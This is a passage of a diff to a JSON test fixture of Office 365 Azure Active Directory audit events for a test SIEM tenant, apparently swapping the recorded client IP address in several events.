APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -11654,9 +11654,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:45", "ExtendedProperties": [ { @@ -11890,7 +11890,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -11920,9 +11920,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:45", "ExtendedProperties": [ { @@ -12156,7 +12156,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 